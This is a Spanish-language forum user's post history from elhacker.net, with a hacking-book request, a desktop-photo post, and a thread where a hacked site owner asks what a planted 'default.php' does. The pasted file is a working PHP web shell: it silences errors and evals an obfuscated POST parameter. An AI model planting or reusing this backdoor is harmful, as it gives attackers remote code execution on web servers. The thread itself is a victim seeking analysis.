elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Seguridad / Mejor Libro Hacking 2013 en: 3 Marzo 2014, 09:54 am
Buenas a todo el foro,

Me gustaría saber cual es para vosotros el mejor libro en tema de Hacking del 2013 (O incluso si hay a partir del 2010 que no esten desfasados). El tema que me gustaría tratar es basica y llanamente seguridad en Entornos Windows, como protegerse y como entrar a una máquina Windows.

Hace un par de meses estuve leyendo: http://www.casadellibro.com/libro-la-biblia-de-hacker-incluye-cd-rom/9788441515383/903882 y prácticamente me lo acabe PERO las técnicas y métodos que ofrece están muy obsoletas (Sólo llega hasta win XP).

Así pues, me gustaría tratar un libro de la misma temática pero ACTUALIZADO.

Cual me recomendais?

Gracias!

Edit: Lo he puesto en Seguridad, ya que el libro trata de seguridad, pero no sé si realmente iría aquí.
Edit2: Si puede ser en Español. A nivel desarrollador me manejo con términos en inglés pero no me siento seguro a nivel de seguridad.
2  Programación / PHP / Re: Web hackeada, que hace este código? en: 3 Diciembre 2012, 13:57 pm
Muchas gracias!!!

De todas maneras con la función eval, ya imprime por pantalla?

Igualmente no uso Wordpress, aunque es posible que en otra carpeta del servidor haya wordpress...

Bueno muchas gracias me quedó todo bastante claro :)
3  Programación / PHP / Web hackeada, que hace este código? en: 3 Diciembre 2012, 10:19 am
Buenas, resulta que nos han hackeado el hosting, la razí y todas las subcarpetas contienen un archivo "default.php" con el siguiente código:

Código:
<?php
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);

if (isset($_GET['r'])) { print $_GET['r']; }
elseif (isset($_POST['e'])) {
eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
}
exit;
?>

Qué se supone que hace? El primer if simplemente hace un echo y el elseif trata una cadena, la pone al reves, la cifra etc. no??

No entiendo mucho la utilidad del código.

Muchas gracias!!
4  Foros Generales / Foro Libre / Re: Sus escritorios en: 2 Noviembre 2004, 08:45 am
a causa de su gran desorganizacion, esk nunca lo arreglo :S lo e arreglao un poco para foto oficial ^^

Caracteristicas: siempre desordenao pero siempre con un fondo que salga algo wapo y siempre SIEMPRE el fondo negro o azul

Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines